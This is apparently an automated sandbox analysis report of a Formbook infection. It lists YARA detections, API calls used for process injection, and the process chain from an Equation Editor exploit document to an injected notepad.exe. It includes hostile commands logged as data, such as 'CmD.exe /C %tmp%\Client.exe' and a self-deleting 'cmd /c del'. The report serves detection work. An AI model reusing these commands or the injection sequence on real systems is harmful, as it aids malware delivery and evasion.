Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00321338	6_2_00321338
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_003236C0	6_2_003236C0
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00324B61	6_2_00324B61
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00322078	6_2_00322078
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0032A100	6_2_0032A100
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00324B70	6_2_00324B70
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00329BD8	6_2_00329BD8
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_004A7928	6_2_004A7928
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0087BA28	6_2_0087BA28
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00870AAB	6_2_00870AAB
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00870048	6_2_00870048
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00878478	6_2_00878478
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0087B188	6_2_0087B188
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0087B508	6_2_0087B508
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0087B348	6_2_0087B348
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02400048	6_2_02400048
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041E0B9	9_2_0041E0B9
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00402D87	9_2_00402D87
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00409E60	9_2_00409E60
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041EE1B	9_2_0041EE1B
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041D688	9_2_0041D688
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AAE0C6	9_2_00AAE0C6
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ADD005	9_2_00ADD005
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B2D06D	9_2_00B2D06D
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AB3040	9_2_00AB3040
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AC905A	9_2_00AC905A
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AAE2E9	9_2_00AAE2E9
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B51238	9_2_00B51238
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B563BF	9_2_00B563BF
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AAF3CF	9_2_00AAF3CF
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AD63DB	9_2_00AD63DB
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AB2305	9_2_00AB2305
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AFA37B	9_2_00AFA37B
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AB7353	9_2_00AB7353
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AC1489	9_2_00AC1489
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AE5485	9_2_00AE5485
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B3443E	9_2_00B3443E
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AED47D	9_2_00AED47D
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B305E3	9_2_00B305E3
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ACC5F0	9_2_00ACC5F0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AB351F	9_2_00AB351F
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AF6540	9_2_00AF6540
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AB4680	9_2_00AB4680
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ABE6C1	9_2_00ABE6C1
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B52622	9_2_00B52622
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AFA634	9_2_00AFA634
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ABC7BC	9_2_00ABC7BC
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B3579A	9_2_00B3579A
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AE57C3	9_2_00AE57C3
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B4F8EE	9_2_00B4F8EE
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B2F8C4	9_2_00B2F8C4
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AD286D	9_2_00AD286D
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ABC85C	9_2_00ABC85C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AB29B2	9_2_00AB29B2
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B5098E	9_2_00B5098E
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AC69FE	9_2_00AC69FE
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B35955	9_2_00B35955
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B3394B	9_2_00B3394B
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B63A83	9_2_00B63A83
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B5CBA4	9_2_00B5CBA4
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B3DBDA	9_2_00B3DBDA
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AD7B00	9_2_00AD7B00
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B4FDDD	9_2_00B4FDDD
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AE0D3B	9_2_00AE0D3B
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ABCD5B	9_2_00ABCD5B
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AE2E2F	9_2_00AE2E2F
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ACEE4C	9_2_00ACEE4C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B4CFB1	9_2_00B4CFB1
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00B22FDC	9_2_00B22FDC
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AC0F3F	9_2_00AC0F3F
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00ADDF7C	9_2_00ADDF7C

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\notepad.exe	Code function: String function: 00AF3F92 appears 132 times
Source: C:\Windows\SysWOW64\notepad.exe	Code function: String function: 00AF373B appears 245 times
Source: C:\Windows\SysWOW64\notepad.exe	Code function: String function: 00AAE2A8 appears 38 times
Source: C:\Windows\SysWOW64\notepad.exe	Code function: String function: 00B1F970 appears 84 times
Source: C:\Windows\SysWOW64\notepad.exe	Code function: String function: 00AADF5C appears 121 times

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00322548 NtQuerySystemInformation,	6_2_00322548
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00322540 NtQuerySystemInformation,	6_2_00322540
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0037F248 NtResumeThread,	6_2_0037F248
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0037D898 NtWriteVirtualMemory,	6_2_0037D898
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0037CE80 NtAllocateVirtualMemory,	6_2_0037CE80
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0037D398 NtProtectVirtualMemory,	6_2_0037D398
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0037DD98 NtSetContextThread,	6_2_0037DD98
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_004A0178 NtClose,	6_2_004A0178
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0240B2E0 NtWriteVirtualMemory,	6_2_0240B2E0
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0240B7B0 NtCreateThreadEx,	6_2_0240B7B0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A360 NtCreateFile,	9_2_0041A360
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A410 NtReadFile,	9_2_0041A410
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A490 NtClose,	9_2_0041A490
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A540 NtAllocateVirtualMemory,	9_2_0041A540
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A35A NtCreateFile,	9_2_0041A35A
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A40A NtReadFile,	9_2_0041A40A
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A48F NtClose,	9_2_0041A48F
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_0041A53C NtAllocateVirtualMemory,	9_2_0041A53C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA00C4 NtCreateFile,LdrInitializeThunk,	9_2_00AA00C4
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA0078 NtResumeThread,LdrInitializeThunk,	9_2_00AA0078
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA0048 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_00AA0048
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9F9F0 NtClose,LdrInitializeThunk,	9_2_00A9F9F0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9F900 NtReadFile,LdrInitializeThunk,	9_2_00A9F900
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FAE8 NtQueryInformationProcess,LdrInitializeThunk,	9_2_00A9FAE8
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_00A9FAD0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FBB8 NtQueryInformationToken,LdrInitializeThunk,	9_2_00A9FBB8
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FB68 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_00A9FB68
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FC90 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_00A9FC90
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FC60 NtMapViewOfSection,LdrInitializeThunk,	9_2_00A9FC60
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FD8C NtDelayExecution,LdrInitializeThunk,	9_2_00A9FD8C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FDC0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_00A9FDC0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FEA0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_00A9FEA0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_00A9FED0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FFB4 NtCreateSection,LdrInitializeThunk,	9_2_00A9FFB4
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA10D0 NtOpenProcessToken,	9_2_00AA10D0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA0060 NtQuerySection,	9_2_00AA0060
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA01D4 NtSetValueKey,	9_2_00AA01D4
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA010C NtOpenDirectoryObject,	9_2_00AA010C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA1148 NtOpenThread,	9_2_00AA1148
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA07AC NtCreateMutant,	9_2_00AA07AC
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9F8CC NtWaitForSingleObject,	9_2_00A9F8CC
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9F938 NtWriteFile,	9_2_00A9F938
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA1930 NtSetContextThread,	9_2_00AA1930
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FAB8 NtQueryValueKey,	9_2_00A9FAB8
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FA20 NtQueryInformationFile,	9_2_00A9FA20
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FA50 NtEnumerateValueKey,	9_2_00A9FA50
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FBE8 NtQueryVirtualMemory,	9_2_00A9FBE8
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FB50 NtCreateKey,	9_2_00A9FB50
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FC30 NtOpenProcess,	9_2_00A9FC30
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FC48 NtSetInformationFile,	9_2_00A9FC48
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA0C40 NtGetContextThread,	9_2_00AA0C40
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00AA1D80 NtSuspendThread,	9_2_00AA1D80
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FD5C NtEnumerateKey,	9_2_00A9FD5C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FE24 NtWriteVirtualMemory,	9_2_00A9FE24
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FFFC NtCreateProcessEx,	9_2_00A9FFFC
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 9_2_00A9FF34 NtQueueApcThread,	9_2_00A9FF34

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.n.o.t.e.p.a.d...e.x.e...........................B.........0.......0.....			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P1P.......4.t...........0.......................&.................0.....			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00A286CE push es; ret	6_2_00A286E3
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00A24403 push esi; ret	6_2_00A24432
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_003290F2 pushfd ; ret	6_2_00329171
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_003290DA push esp; ret	6_2_003290F1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00328F38 push eax; retn 002Dh	6_2_00328F39
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_003606AF push 036C4A39h; ret	6_2_003606B9
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_004AA4B6 push esi; iretd	6_2_004AA4B7
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_004AA8B5 push edi; retf	6_2_004AA8B6
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_004D7CC7 push ecx; ret	6_2_004D7CCC
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_004D7112 push es; iretd	6_2_004D7117
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00873EBF push ebx; retf	6_2_00873EC0
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_00873ABB push edi; iretd	6_2_00873ABC
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_008746BB push edx; ret	6_2_008746C1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0087051F push es; iretd	6_2_00870533
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02407248 push 00000003h; ret	6_2_0240725D
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02401E4D push 00000003h; ret	6_2_02401E57
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02404E5A push 00000003h; ret	6_2_02404E71
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02403E63 push 00000003h; ret	6_2_02403E79
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02402671 push 00000003h; ret	6_2_0240267B
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02402E71 push 00000003h; ret	6_2_02402E74
